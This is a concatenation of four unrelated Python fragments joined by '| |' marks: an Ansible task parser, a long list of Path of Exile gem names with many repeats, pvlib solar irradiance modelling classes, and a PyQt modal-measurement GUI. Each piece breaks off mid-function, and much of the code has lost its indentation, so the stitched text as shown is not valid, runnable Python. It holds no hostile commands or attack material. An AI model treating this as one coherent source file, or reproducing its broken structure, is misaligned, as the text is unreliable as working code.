    def add_context(self):
        """Add block context - all options which we don't parse currently.

        Returns:
            str: Block context as commented lines
        """
        block_context = ["## BLOCK-CONTEXT:"]
        for part in self.block:
            if part in BLOCK_ATTRS and part not in ("block", "environment"):
                block_context.append(f"{part}: {self.block[part]}")
        return "\n".join(block_context)

    def parse(self):
        """Parse block of tasks.

        Returns:
            list: List of maps with parsed tasks.
        """
        result = []
        if "environment" in self.block:
            for k, v in self.block["environment"].items():
                result.append(
                    Map(
                        {
                            "NAME": f"Set block env value for {k}",
                            "ENV": f"{k} {v}",
                        }
                    )
                )
        self.block["context"] = self.add_context()
        # BUG FIX: the ENV tasks built above were previously discarded by
        # rebinding `result`; extend so they precede the block's tasks.
        result.extend(
            AnsibleTasksList(
                self.block["block"], block=self.block, **self.kwargs
            ).parse()
        )
        return result
class AnsibleIncludeTasks:
"""AnsibleIncludeTasks class parses a tasks file from include block."""
def __init__(self, include, **kwargs):
"""Parse included file of tasks, passing all context argument to tasks.
Args:
include (dict): Dictionary of include task loaded from YAML
"""
self.include = include
self.kwargs = kwargs
def add_context(self):
"""Add inlcude context - all options which we don't parse currently.
Returns:
str: Include context as commented lines
"""
include_context = ["## INCLUDE-CONTEXT:"]
for part in self.include:
if part in TASK_ATTRS and part not in (
"include",
"include_tasks",
"environment",
):
include_context.append(f"{part}: {self.include[part]}")
return "\n".join(include_context)
def parse(self):
"""Parse file with tasks.
Returns:
list: List of maps with parsed tasks.
"""
result = []
if "environment" in self.include:
for k, v in self.include["environment"].items():
result.append(
Map(
{
"NAME": f"Set include env value for {k}",
"ENV": f"{k} {v}",
}
)
)
self.include["context"] = self.add_context()
tasks_file = self.include.get("include") or self.include.get(
"include_tasks"
)
with open(tasks_file, "r", encoding="utf-8") as f:
tasks = yaml_load(f)
result = AnsibleTasksList(
tasks, | |
"Venom Gyre",
"Shrapnel Ballista",
"Awakened Arrow Nova Support",
"Wintertide Brand",
"Awakened Vicious Projectiles Support",
"Frost Shield",
"Crackling Lance",
"Anomalous Essence Drain",
"Divergent Lightning Warp",
"Venom Gyre",
"Onslaught Support",
"Spell Totem Support",
"Infernal Cry",
"Trap Support",
"Poacher's Mark",
"Punishment",
"Wrath",
"Cast when Stunned Support",
"Vaal Discipline",
"Warlord's Mark",
"Intimidating Cry",
"Flammability",
"Righteous Fire",
"Sweep",
"Life Leech Support",
"Storm Burst",
"Berserk",
"Zealotry",
"Spark",
"Explosive Arrow",
"Deadly Ailments Support",
"Additional Accuracy Support",
"Siege Ballista",
"Lesser Poison Support",
"Endurance Charge on Melee Stun Support",
"Vaal Double Strike",
"Flame Wall",
"Melee Physical Damage Support",
"Ancestral Warchief",
"Bloodlust Support",
"Penance Brand",
"Split Arrow",
"Viper Strike",
"Precision",
"Ancestral Call Support",
"Cold Penetration Support",
"Mirage Archer Support",
"Blasphemy Support",
"Summon Skeletons",
"Minion Speed Support",
"Vigilant Strike",
"Dominating Blow",
"Culling Strike Support",
"Void Sphere",
"Ballista Totem Support",
"Blood Rage",
"Fist of War Support",
"Deadly Ailments Support",
"Conductivity",
"Decoy Totem",
"Blind Support",
"Vaal Rain of Arrows",
"Sigil of Power",
"Riposte",
"Vortex",
"Flame Wall",
"Pierce Support",
"Steelskin",
"Swiftbrand Support",
"Ground Slam",
"Cast while Channelling Support",
"Advanced Traps Support",
"Enduring Cry",
"Discipline",
"Flame Dash",
"Knockback Support",
"Burning Arrow",
"Bear Trap",
"Summon Holy Relic",
"Unleash Support",
"Second Wind Support",
"Fork Support",
"Herald of Purity",
"Herald of Purity",
"Increased Duration Support",
"Purity of Elements",
"Shockwave Totem",
"Shockwave Support",
"Leap Slam",
"Bladefall",
"Charged Traps Support",
"Seismic Trap",
"Creeping Frost",
"Sniper's Mark",
"Glacial Cascade",
"Purity of Ice",
"Sigil of Power",
"Vaal Discipline",
"Blast Rain",
"Chain Support",
"Bone Offering",
"Trap and Mine Damage Support",
"Vaal Ancestral Warchief",
"Explosive Trap",
"Purity of Lightning",
"Bladefall",
"Anger",
"Sigil of Power",
"Infernal Blow",
"Additional Accuracy Support",
"Brutality Support",
"Tempest Shield",
"Purity of Elements",
"Wild Strike",
"Bonechill Support",
"Energy Leech Support",
"Crackling Lance",
"Spell Totem Support",
"Vicious Projectiles Support",
"Seismic Cry",
"Smite",
"Chain Hook",
"Puncture",
"Inspiration Support",
"Lightning Penetration Support",
"Arcanist Brand",
"Poacher's Mark",
"Greater Volley Support",
"Wild Strike",
"Arrow Nova Support",
"Purity of Elements",
"Point Blank Support",
"Bodyswap",
"Barrage Support",
"Bladefall",
"Purity of Fire",
"Decoy Totem",
"Vaal Grace",
"Shock Nova",
"Bladefall",
"Blood Magic Support",
"Lightning Strike",
"Firestorm",
"Desecrate",
"Heavy Strike",
"Explosive Trap",
"Dread Banner",
"Inspiration Support",
"Infernal Legion Support",
"High-Impact Mine Support",
"Spellslinger Support",
"Rune Blast",
"Urgent Orders Support",
"Awakened Lightning Penetration Support",
"Awakened Deadly Ailments Support",
"Frost Shield",
"Shock Nova",
"Bladestorm",
"Volatile Dead",
"Vaal Rain of Arrows",
"Dual Strike",
"Cobra Lash",
"Cast while Channelling Support",
"Decay Support",
"Kinetic Bolt",
"Vaal Power Siphon",
"Shock Nova",
"Efficacy Support",
"Charged Mines Support",
"Vaal Haste",
"Conductivity",
"Berserk",
"Awakened Burning Damage Support",
"Flesh and Stone",
"Kinetic Bolt",
"Vile Toxins Support",
"Armageddon Brand",
"Arcanist Brand",
"Elemental Army Support",
"Withering Step",
"Detonate Dead",
"Cold Penetration Support",
"Lancing Steel",
"Multiple Totems Support",
"Immortal Call",
"Cold to Fire Support",
"Shattering Steel",
"Infernal Blow",
"Determination",
"Kinetic Bolt",
"Storm Call",
"Power Siphon",
"Immortal Call",
"Storm Brand",
"Meat Shield Support",
"Awakened Void Manipulation Support",
"Hypothermia Support",
"Awakened Cast While Channelling Support",
"Multiple Traps Support",
"Ice Nova",
"Rain of Arrows",
"Vaal Molten Shell",
"Urgent Orders Support",
"Firestorm",
"Enfeeble",
"Cold Snap",
"Ruthless Support",
"Sigil of Power",
"Cluster Traps Support",
"Pinpoint Support",
"Summon Skitterbots",
"Consecrated Path",
"Iron Will Support",
"Sniper's Mark",
"Vaal Cold Snap",
"Shattering Steel",
"Awakened Unbound Ailments Support",
"Meat Shield Support",
"Bonechill Support",
"Dual Strike",
"Second Wind Support",
"Purity of Fire",
"Raise Spectre",
"Greater Multiple Projectiles Support",
"Elemental Proliferation Support",
"Tornado Shot",
"Clarity",
"Determination",
"Decay Support",
"Blight",
"Reckoning",
"Ice Shot",
"Cast on Melee Kill Support",
"Efficacy Support",
"Lightning Spire Trap",
"Devouring Totem",
"Divine Ire",
"Close Combat Support",
"Rage Support",
"Flesh and Stone",
"Hextouch Support",
"Flameblast",
"Arcanist Brand",
"Vaal Ice Nova",
"Perforate",
"Vaal Detonate Dead",
"Immolate Support",
"Despair",
"Riposte",
"Blade Blast",
"Chain Support",
"Holy Flame Totem",
"Clarity",
"Close Combat Support",
"Phase Run",
"Poison Support",
"Armageddon Brand",
"Physical to Lightning Support",
"Flesh Offering",
"Minion Life Support",
"Righteous Fire",
"Discharge",
"Berserk",
"Mirage Archer Support",
"Lightning Arrow",
"Purifying Flame",
"Swiftbrand Support",
"Increased Critical Damage Support",
"Ice Trap",
"Wave of Conviction",
"Stormblast Mine",
"Enlighten Support",
"Urgent Orders Support",
"Spectral Throw",
"Discharge",
"Swiftbrand Support",
"Signal Prey",
"Signal Prey",
"Frostblink",
"Vulnerability",
"Convocation",
"Vaal Spark",
"Fire Penetration Support",
"Malevolence",
"Withering Touch Support",
"Greater Volley Support",
"Ancestral Cry",
"Point Blank Support",
"Second Wind Support",
"Determination",
"Fist of War Support",
"Herald of Thunder",
"Charged Dash",
"Void Sphere",
"Sweep",
"Vaal Summon Skeletons",
"Cast on Death Support",
"Crackling Lance",
"Plague Bearer",
"Ballista Totem Support",
"Multiple Traps Support",
"Dash",
"General's Cry",
"Zealotry",
"Fork Support",
"Charged Traps Support",
"Wave of Conviction",
"Fist of War Support",
"Multiple Totems Support",
"Clarity",
"Sweep",
"Earthquake",
"Shield Charge",
"Pulverise Support",
"Additional Accuracy Support",
"Galvanic Arrow",
"Zealotry",
"Venom Gyre",
"Consecrated Path",
"Withering Step",
"Raise Zombie",
"Pyroclast Mine",
"Mana Leech Support",
"Trap Support",
"Bear Trap",
"Controlled Destruction Support",
"Hypothermia Support",
"Kinetic Blast",
"Physical to Lightning Support",
"Increased Duration Support",
"Earthquake",
"Ancestral Protector",
"Vaal Righteous Fire",
"Reckoning",
"Winter Orb",
"Impale Support",
"Pestilent Strike",
"Awakened Melee Splash Support",
"Blazing Salvo",
"Doom Blast",
"Lacerate",
"Frostbite",
"Blind Support",
"Herald of Thunder",
"Dark Pact",
"Shattering Steel",
"Arcane Cloak",
"Pestilent Strike",
"Cold to Fire Support",
"Shrapnel Ballista",
"Charged Mines Support",
"Wither",
"Penance Brand",
"Tempest Shield",
"Ice Spear",
"Charged Dash",
"Unleash Support",
"Blade Blast",
"Flammability",
"Chain Hook",
"Faster Projectiles Support",
"Physical to Lightning Support",
"Convocation",
"Elemental Proliferation Support",
"Conductivity",
"Storm Call",
"Cast on Death Support",
"Void Manipulation Support",
"Cremation",
"Magma Orb",
"Unbound Ailments Support",
"Frost Bomb",
"Fire Penetration Support",
"Herald of Agony",
"Elemental Weakness",
"Damage on Full Life Support",
"Generosity Support",
"Barrage Support",
"Tectonic Slam",
"Charged Mines Support",
"Elemental Weakness",
"Wither",
"Spell Cascade Support",
"Ignite Proliferation Support",
"Frostblink",
"Anger",
"Pride",
"Trap and Mine Damage Support",
"Burning Arrow",
"Bonechill Support",
"Wave of Conviction",
"Icicle Mine",
"Barrage Support",
"Intensify Support",
"Heavy Strike",
"Flame Surge",
"Vengeance",
"Frost Wall",
"Flicker Strike",
"Lightning Spire Trap",
"Riposte",
"Intensify Support",
"Divine Ire",
"Split Arrow",
"Enfeeble",
"War Banner",
"Added Chaos Damage Support",
"Winter Orb",
"Minion Speed Support",
"Cold Snap",
"Decay Support",
"Dash",
"Vaal Fireball",
"Pride",
"Brand Recall",
"Spell Cascade Support",
"Life Gain on Hit Support",
"Vulnerability",
"Cast on Death Support",
"Malevolence",
"Lesser Poison Support",
"Haste",
"Arcane Surge Support",
"Awakened Fire Penetration Support",
"Additional Accuracy Support",
"Summon Raging Spirit",
"Soulrend",
"Life Gain on Hit Support",
"Rage Support",
"Icicle Mine",
"Fire Penetration Support",
"Spell Echo Support",
"Vaal Impurity of Ice",
"Inspiration Support",
"Burning Damage Support",
"Vigilant Strike",
"Less Duration Support",
"Elemental Weakness",
"Detonate Dead",
"Unleash Support",
"Storm Brand",
"Infernal Cry",
"Melee Physical Damage Support",
"Smite",
"Wrath",
"Vitality",
"Ball Lightning",
"Increased Area of Effect Support",
"Minion Damage Support",
"Frost Bomb",
"Knockback Support",
"Sweep",
"Lacerate",
"Frost Blades",
"Innervate Support",
"Wrath",
"Storm Burst",
"Temporal Chains",
"Storm Burst",
"Molten Shell",
"Static Strike",
"Added Chaos Damage Support",
"Herald of Purity",
"Vaal Ground Slam",
"Ice Trap",
"Conversion Trap",
"Lancing Steel",
"Intensify Support",
"Elemental Army Support",
"Ballista Totem Support",
"Spellslinger Support",
"Ancestral Cry",
"Void Sphere",
"Sigil of Power",
"Spellslinger Support",
"Grace",
"Vaal Arc",
"Flicker Strike",
"Energy Leech Support",
"Phase Run",
"Arcane Surge Support",
"Arctic Armour",
"Frost Blades",
"Swift Affliction Support",
"Detonate Dead",
"Precision",
"Vaal Grace",
"Combustion Support",
"Flame Wall",
"Endurance Charge on Melee Stun Support",
"Double Strike",
"Pinpoint Support",
"Impale Support",
"Cobra Lash",
"Discipline",
"Summon Lightning Golem",
"Vaal Impurity of Lightning",
"Innervate Support",
"Burning Arrow",
"Barrage Support",
"Energy Leech Support",
"Iron Grip Support",
"Clarity",
"Ice Crash",
"Spirit Offering",
"Rallying Cry",
"Fork Support",
"Mirage Archer Support",
"Flame Wall",
"Hatred",
"Bone Offering",
"Elemental Focus Support",
"Ice Spear",
"Chance to Flee Support",
"Molten Strike",
"Burning Damage Support",
"Volatile Dead",
"Life Leech Support",
"Summon Skitterbots",
"Summon Chaos Golem",
"Fireball",
"Combustion Support",
"Bane",
"Purity of Elements",
"Blastchain Mine Support",
"Cold Snap",
"Blasphemy Support",
"High-Impact Mine Support",
"Sigil of Power",
"Multistrike Support",
"Life Gain on Hit Support",
"Ice Crash",
"Iron Grip Support",
"Spellslinger Support",
"Lightning Trap",
"Intensify Support",
"Feeding Frenzy Support",
"Feeding Frenzy Support",
"Cyclone",
"Cast On Critical Strike Support",
"Spectral Throw",
"Consecrated Path",
"Purity of Lightning",
"Physical to Lightning Support",
"Unearth",
"Cast when Stunned Support",
"Damage on Full Life Support",
"Rune Blast",
"Freezing Pulse",
"Ensnaring Arrow",
"Siphoning Trap",
"Spell Totem Support",
"Withering Step",
"Infernal Legion Support",
"Flame Surge",
"Bloodlust Support",
"Explosive Arrow",
"Ancestral | |
of a Static Flat Plate system
        from dii and gii. If any of them is missing, it is calculated from dni, ghi and dhi
using corresponding pvlib function.
Internal `aoi_limit` parameter from `module_parameters` sets the limit
of tracking of the Static CPV system and therefore when the dii irradiance
is added to the poa_diffuse.
Spillage factor accounts for the dii fraction that is allowed to pass into the system
See https://doi.org/10.1002/pip.3387 for details
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
dni : numeric
Direct Normal Irradiance
ghi : numeric
Global horizontal irradiance
dhi : numeric
Diffuse horizontal irradiance
dii : numeric
Direct (on the) Inclinated (plane) Irradiance
gii : numeric
Global (on the) Inclinated (plane) Irradiance
dni_extra : None or numeric, default None
Extraterrestrial direct normal irradiance
airmass : None or numeric, default None
Airmass
model : String, default 'isotropic'
Irradiance model.
spillage : float
Percentage of dii allowed to pass into the system
Returns
-------
poa_flatplate_static : numeric
Plane of Array Irradiance
"""
# not needed for all models, but this is easier
if dni_extra is None:
dni_extra = pvlib.irradiance.get_extra_radiation(
solar_zenith.index)
if airmass is None:
airmass = pvlib.atmosphere.get_relative_airmass(solar_zenith)
if self.in_singleaxis_tracker:
tracking_info = pvlib.tracking.singleaxis(
solar_zenith, solar_azimuth, **self.parameters_tracker)
surface_tilt = tracking_info.surface_tilt
surface_azimuth = tracking_info.surface_azimuth
else:
surface_tilt = self.surface_tilt
surface_azimuth = self.surface_azimuth
if dii is None:
dii = pvlib.irradiance.beam_component(
surface_tilt,
surface_azimuth,
solar_zenith,
solar_azimuth,
dni)
if gii is None:
irr = pvlib.irradiance.get_total_irradiance(surface_tilt,
surface_azimuth,
solar_zenith, solar_azimuth,
dni, ghi, dhi,
dni_extra=dni_extra,
airmass=airmass,
model=model,
albedo=self.albedo,
**kwargs)
poa_diffuse = irr['poa_diffuse']
gii = irr['poa_global']
else:
poa_diffuse = gii - dii
poa_diffuse += dii * spillage
aoi = self.get_aoi(solar_zenith, solar_azimuth)
if 'aoi_limit' in self.module_parameters:
aoi_limit = self.module_parameters['aoi_limit']
else:
raise AttributeError(
'Missing "aoi_limit" parameter in "module_parameters"')
poa_flatplate_static = pd.concat(
[poa_diffuse[aoi < aoi_limit], gii[aoi > aoi_limit]]).sort_index()
return poa_flatplate_static
def get_effective_irradiance(self, solar_zenith, solar_azimuth, dni=None,
ghi=None, dhi=None, dii=None, gii=None, dni_extra=None,
airmass=None, model='haydavies', spillage=0, aoi_thld=None, **kwargs):
"""
Calculates the effective irradiance (taking into account the IAM)
TO BE VALIDATED
Parameters
----------
solar_zenith : float or Series
Solar zenith angle.
solar_azimuth : float or Series
Solar azimuth angle.
dni : float or Series
Direct Normal Irradiance
Returns
-------
poa_flatplate_static_effective : float or Series
Effective Direct (on the) Inclinated (plane) Irradiance
Plane of array irradiance plus the effect of AOI
"""
poa_flatplate_static = self.get_irradiance(solar_zenith, solar_azimuth, dni=dni,
ghi=ghi, dhi=dhi, dii=dii, gii=gii, dni_extra=dni_extra,
airmass=airmass, model=model, spillage=spillage, **kwargs)
# * self.get_iam(
poa_flatplate_static_effective = poa_flatplate_static
# aoi=aoi, aoi_thld=aoi_thld, m1=1, b1=0, m2=1, b2=0)
return poa_flatplate_static_effective
def pvsyst_celltemp(self, poa_flatplate_static, temp_air, wind_speed=1.0):
"""
Uses :py:func:`pvsystem.pvsyst_celltemp` to calculate module
temperatures based on ``self.racking_model`` and the input parameters.
Parameters
----------
See pvsystem.pvsyst_celltemp for details
Returns
-------
See pvsystem.pvsyst_celltemp for details
"""
kwargs = _build_kwargs(['eta_m', 'alpha_absorption'],
self.module_parameters)
kwargs.update(_build_kwargs(['u_c', 'u_v'],
self.temperature_model_parameters))
return pvlib.temperature.pvsyst_cell(poa_flatplate_static, temp_air, wind_speed,
**kwargs)
class StaticHybridSystem():
"""
The StaticHybridSystem class defines a set of Static Hybrid system attributes and
modeling functions. This class describes the collection and interactions of
Static CPV system components installed on a Fixed Panel or a Single Axis tracker.
It is the composition of two subsystems: StaticCPVSystem and StaticFlatPlateSystem
The class supports basic system topologies consisting of:
* `N` total modules arranged in series
(`modules_per_string=N`, `strings_per_inverter=1`).
* `M` total modules arranged in parallel
(`modules_per_string=1`, `strings_per_inverter=M`).
* `NxM` total modules arranged in `M` strings of `N` modules each
(`modules_per_string=N`, `strings_per_inverter=M`).
The attributes should generally be things that don't change about
    the system, such as the type of module and the inverter. The instance
methods accept arguments for things that do change, such as
irradiance and temperature.
See https://doi.org/10.1002/pip.3387
Parameters
----------
    surface_tilt: float or array-like, default 30
Surface tilt angles in decimal degrees.
The tilt angle is defined as degrees from horizontal
(e.g. surface facing up = 0, surface facing horizon = 90)
surface_azimuth: float or array-like, default 180
Azimuth angle of the module surface.
North=0, East=90, South=180, West=270.
module : None or string, default None
The model name of the modules.
May be used to look up the module_parameters dictionary
via some other method.
module_parameters : None, dict or Series, default None
Module parameters as defined by the SAPM, CEC, or other.
modules_per_string: int or float, default 1
See system topology discussion above.
strings_per_inverter: int or float, default 1
See system topology discussion above.
inverter : None or string, default None
The model name of the inverters.
May be used to look up the inverter_parameters dictionary
via some other method.
inverter_parameters : None, dict or Series, default None
Inverter parameters as defined by the SAPM, CEC, or other.
racking_model : None or string, default 'freestanding'
Used for cell and module temperature calculations.
losses_parameters : None, dict or Series, default None
Losses parameters as defined by PVWatts or other.
    in_singleaxis_tracker : None or bool, default False
        Controls whether the system is mounted on a NS single axis tracker
If true, it affects get_aoi() and get_irradiance()
name : None or string, default None
**kwargs
Arbitrary keyword arguments.
Included for compatibility, but not used.
"""
def __init__(self,
surface_tilt=30,
surface_azimuth=180,
module_cpv=None,
module_parameters_cpv=None,
temperature_model_parameters_cpv=None,
module_flatplate=None,
module_parameters_flatplate=None,
temperature_model_parameters_flatplate=None,
in_singleaxis_tracker=False,
parameters_tracker=None,
modules_per_string=1,
strings_per_inverter=1,
inverter=None,
inverter_parameters=None,
racking_model="insulated",
losses_parameters=None,
name=None,
**kwargs):
self.name = name
self.surface_tilt = surface_tilt
self.surface_azimuth = surface_azimuth
# could tie these together with @property
self.module_cpv = module_cpv
self.module_flatplate = module_flatplate
self.in_singleaxis_tracker = in_singleaxis_tracker
if module_parameters_cpv is None:
self.module_parameters_cpv = {}
else:
self.module_parameters_cpv = module_parameters_cpv
if module_parameters_flatplate is None:
self.module_parameters_flatplate = {}
else:
self.module_parameters_flatplate = module_parameters_flatplate
if parameters_tracker is None:
self.parameters_tracker = {}
else:
self.parameters_tracker = parameters_tracker
self.modules_per_string = modules_per_string
self.strings_per_inverter = strings_per_inverter
self.inverter = inverter
if inverter_parameters is None:
self.inverter_parameters = {}
else:
self.inverter_parameters = inverter_parameters
if losses_parameters is None:
self.losses_parameters = {}
else:
self.losses_parameters = losses_parameters
self.racking_model = racking_model
self.static_cpv_sys = StaticCPVSystem(
surface_tilt=surface_tilt,
surface_azimuth=surface_azimuth,
module=module_cpv,
module_parameters=module_parameters_cpv,
temperature_model_parameters=temperature_model_parameters_cpv,
in_singleaxis_tracker=in_singleaxis_tracker,
modules_per_string=modules_per_string,
strings_per_inverter=strings_per_inverter,
inverter=inverter,
inverter_parameters=inverter_parameters,
racking_model=racking_model,
losses_parameters=losses_parameters,
name=name,
)
self.static_flatplate_sys = StaticFlatPlateSystem(
surface_tilt=surface_tilt,
surface_azimuth=surface_azimuth,
module=module_flatplate,
module_parameters=module_parameters_flatplate,
temperature_model_parameters=temperature_model_parameters_flatplate,
in_singleaxis_tracker=in_singleaxis_tracker,
modules_per_string=modules_per_string,
strings_per_inverter=strings_per_inverter,
inverter=inverter,
inverter_parameters=inverter_parameters,
racking_model=racking_model,
losses_parameters=losses_parameters,
name=name,
)
def __repr__(self):
attrs = ['name', 'module_cpv', 'module_flatplate',
'inverter', 'racking_model']
return ('StaticHybridSystem: \n ' + '\n '.join(
('{}: {}'.format(attr, getattr(self, attr)) for attr in attrs)))
def get_effective_irradiance(self, solar_zenith, solar_azimuth, dni,
ghi=None, dhi=None, dii=None, gii=None, dni_extra=None,
airmass=None, model='haydavies', spillage=0, **kwargs):
"""
Calculates the effective irradiance (taking into account the IAM)
TO BE VALIDATED
Parameters
----------
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
dni : numeric
Direct Normal Irradiance
ghi : numeric
Global horizontal irradiance
dhi : numeric
Diffuse horizontal irradiance
dii : numeric
Direct (on the) Inclinated (plane) Irradiance
gii : numeric
Global (on the) Inclinated (plane) Irradiance
dni_extra : None or numeric, default None
Extraterrestrial direct normal irradiance
airmass : None or numeric, default None
Airmass
model : String, default 'isotropic'
Irradiance model.
spillage : float
Percentage of dii allowed to pass into the system
Returns
-------
dii_effective : float or Series
Effective Direct (on the) Inclinated (plane) Irradiance [StaticCPVSystem]
Beam component of the plane of array irradiance plus the effect of AOI
poa_flatplate_static_effective : float or Series
Effective Direct (on the) Inclinated (plane) Irradiance [StaticFlatPlateSystem]
Plane of array irradiance plus the effect of AOI
"""
dii_effective = self.static_cpv_sys.get_effective_irradiance(
solar_zenith, solar_azimuth, dni)
aoi = self.static_flatplate_sys.get_aoi(solar_zenith, solar_azimuth)
poa_flatplate_static_effective = self.static_flatplate_sys.get_effective_irradiance(solar_zenith,
solar_azimuth,
aoi=aoi,
dii=dii,
gii=gii,
ghi=ghi,
dhi=dhi,
dni=dni,
model=model,
spillage=spillage,
**kwargs
)
return dii_effective, poa_flatplate_static_effective
def pvsyst_celltemp(self, dii, poa_flatplate_static, temp_air, wind_speed=1.0):
"""
Uses :py:func:`pvsystem.pvsyst_celltemp` to calculate module
temperatures based on ``self.racking_model`` and the input parameters.
Parameters
----------
dii : numeric
Direct (on the) Inclinated (plane) Irradiance [StaticCPVSystem]
poa_flatplate_static : numeric
Plane of Array Irradiance [StaticFlatPlateSystem]
See pvsystem.pvsyst_celltemp for details
Returns
-------
See pvsystem.pvsyst_celltemp for details
"""
celltemp_cpv = self.static_cpv_sys.pvsyst_celltemp(
dii, temp_air, wind_speed)
celltemp_flatplate = self.static_flatplate_sys.pvsyst_celltemp(
poa_flatplate_static, temp_air, wind_speed)
return celltemp_cpv, celltemp_flatplate
def calcparams_pvsyst(self, dii, poa_flatplate_static, temp_cell_cpv, temp_cell_flatplate):
"""
Use the :py:func:`calcparams_pvsyst` function, the input
parameters and ``self.module_parameters`` to calculate the
module currents and resistances.
Parameters
----------
dii : numeric
Direct (on the) Inclinated (plane) Irradiance | |
msgBox.setIcon(QtWidgets.QMessageBox.Information)
msgBox.setText('Looks like there are no hardware interfaces configured. Plese do so using the'
' preferences menu.')
connectButton = msgBox.addButton(self.tr('Take me to preferences'), QtWidgets.QMessageBox.ActionRole)
msgBox.setStandardButtons(QtWidgets.QMessageBox.Cancel)
ret = msgBox.exec_()
if msgBox.clickedButton() == connectButton:
self.open_configuration_window()
self.button_run.blockSignals(True)
self.button_run.toggle()
self.button_run.blockSignals(False)
return False
else:
if self.button_run.isChecked():
# Start measurement.
print ('Started measurement.')
print ('checked state:', self.button_run.isChecked())
self.start_measurement()
self.button_run.setIcon(qta.icon('fa.stop', color='white', scale_factor=1.6))
self.button_run.setText(' Stop')
else:
# Stop measurement.
print('Stopping measurement.')
print ('checked state:', self.button_run.isChecked())
self.stop_routine()
self.button_run.setIcon(qta.icon('fa.play', color='white', scale_factor=1.6))
self.button_run.setText(' Measure')
def _add_new_model(self):
# pop dialog window.
dialog = QtWidgets.QDialog()
dialog.setWindowTitle('New Model')
input_layout = QtWidgets.QHBoxLayout()
model_name_edit = QtWidgets.QLineEdit()
rxval = QtGui.QRegExpValidator(QtCore.QRegExp('[A-Za-z_-][A-Za-z0-9_- ]{2,20}'))
model_name_edit.setValidator(rxval)
model_name_label = QtWidgets.QLabel('Model name')
input_layout.addWidget(model_name_label)
input_layout.addWidget(model_name_edit)
button_layout = QtWidgets.QHBoxLayout()
button_ok = QtWidgets.QPushButton('Accept')
button_ok.setDefault(True)
button_ok.setDisabled(True)
button_ok.clicked.connect(dialog.accept)
button_cancel = QtWidgets.QPushButton('Dismiss')
button_cancel.clicked.connect(dialog.reject)
button_layout.addWidget(button_cancel)
button_layout.addWidget(button_ok)
def check():
if model_name_edit.hasAcceptableInput():
button_ok.setEnabled(True)
else:
button_ok.setDisabled(True)
model_name_edit.textEdited.connect(check)
layout = QtWidgets.QVBoxLayout()
layout.addLayout(input_layout)
layout.addLayout(button_layout)
dialog.setLayout(layout)
accepted = dialog.exec_()
if accepted:
self.modaldata.new_model(entries=dict(model_name=model_name_edit.text()))
self.reload()
self.button_model.setCurrentIndex(self.button_model.count()-1)
else:
self.button_model.setCurrentIndex(self.button_model.currentIndex())
def update_table_model_id(self):
try:
model_id = self.modaldata.tables['info'].model_id.values[self.button_model.currentIndex()]
except IndexError:
model_id = self.modaldata.tables['info'].model_id.min()
self.table_model.update(self.modaldata.tables['measurement_index'], model_id)
idx_m = self.modaldata.tables['measurement_index']
idx_m = idx_m[idx_m.model_id == self.button_model.currentIndex()]
val_m = self.modaldata.tables['measurement_values']
# TODO: Do some smart(er) node (ref/resp) numbering. Connect with geometry.
if idx_m.shape[0] == 0:
ref_node = 1
rsp_node = 1
else:
last_line = idx_m.tail(1)
if self.button_roving.currentIndex() == 0:
ref_node = last_line.ref_node.values[0] + 1
rsp_node = last_line.rsp_node.values[0]
else:
ref_node = last_line.ref_node.values[0]
rsp_node = last_line.rsp_node.values[0] + 1
self.ref_node_spin.setValue(ref_node)
self.resp_node_spin.setValue(rsp_node)
    def reload(self, *args, **kwargs):
        """Called when data is loaded/imported.

        Re-populates the model selector from the ``info`` table, resets the
        overload/double-hit indicators, refreshes the measurement table and
        re-labels all plots according to the channel types configured in
        ``self.settings``. If the excitation type changed since the last
        reload, the dock layout is rearranged to match.
        """
        selected_model_id = self.settings['selected_model_id']
        if 'task_name' in self.settings:
            # Drop the stored DAQ task name if it can no longer be opened
            # (e.g. the hardware was removed or reconfigured).
            try:
                i = dq.DAQTask(self.settings['task_name'])
            except dq.DAQError:
                del self.settings['task_name']
        # Update models list.
        self.modaldata.tables['info'].sort_values('model_id', inplace=True)
        models = self.modaldata.tables['info'].model_name
        # old_model_index = self.button_model.currentIndex()
        self.button_model.clear()
        self.button_model.addItems(models.values)
        self.button_model.setCurrentIndex(selected_model_id)
        # self.button_model.setCurrentIndex(old_model_index)
        # Grey out the status indicators until a measurement runs.
        self.button_overload.setStyleSheet('color: lightgray')
        self.button_doublehit.setStyleSheet('color: lightgray')
        try:
            model_id = self.modaldata.tables['info'].model_id.values[self.button_model.currentIndex()]
        except IndexError:
            # No info row at the current index -- fall back to the smallest id.
            model_id = self.modaldata.tables['info'].model_id.min()
        self.table_model.update(self.modaldata.tables['measurement_index'], model_id)
        # Update with preferences also.
        # TODO: Check which channel is the excitation channel.
        # TODO: Pull correct units!
        # Maps a channel-type code to [name, unit, PSD name, PSD unit].
        units_glossary = dict(a=['Acceleration','g', 'Acceleration PSD', 'g^2/Hz'],
                              v=['Velocity','m/s', 'Velocity PSD', '(m/s)^2/Hz'],
                              d=['Displacement', 'mm', 'Displacement PSD', 'mm^2/Hz'],
                              e=['Strain', '/', 'Strain PSD', '(/)^2/Hz'],
                              f=['Force', 'N', 'Force PSD', 'N^2/Hz'],
                              mixed=['Mixed', 'mixed', 'Mixed PSD', 'mixed^2/Hz'])
        exc_idx = self.settings['exc_channel']
        units_exc_idx = self.settings['channel_types'][exc_idx]
        self.fig_exc.setLabel('left', units_glossary[units_exc_idx][0], units=units_glossary[units_exc_idx][1])
        self.fig_exc.setLabel('bottom', 'Time', units='s')
        # -- Check units consistency.
        response_indices = self.settings['resp_channels']
        channel_types = [self.settings['channel_types'][idx] for idx in response_indices]
        # True when every response channel has the same type (all-equal check).
        if channel_types[1:] == channel_types[:-1]:
            # units are consistent
            units_resp_idx = channel_types[0]
        else:
            # Mixed response channel types -- use the generic label.
            units_resp_idx = 'mixed'
        # resp_idx = self.settings['resp_channels'][0]
        # units_resp_idx = self.settings['channel_types'][resp_idx]
        self.fig_resp.setLabel('left', units_glossary[units_resp_idx][0], units=units_glossary[units_resp_idx][1])
        self.fig_resp.setLabel('bottom', 'Time', units='s')
        if self.settings['excitation_type'] != self.excitation_type_old:
            print('Exc type changed')
            # -- Only do this if excitation type was changed. See self.open_configuration_window(...)
            if self.settings['excitation_type'] == 'impulse':
                # Prepare for impulse measurement.
                self.dock_area.moveDock(self.dock_measurement, 'top', self.dock_estimators)#, self.dock_estimators)
                self.dock_area.moveDock(self.dock_estimators, 'bottom', self.dock_measurement)#, self.dock_estimators)
                self.excitation_type_old = 'impulse'
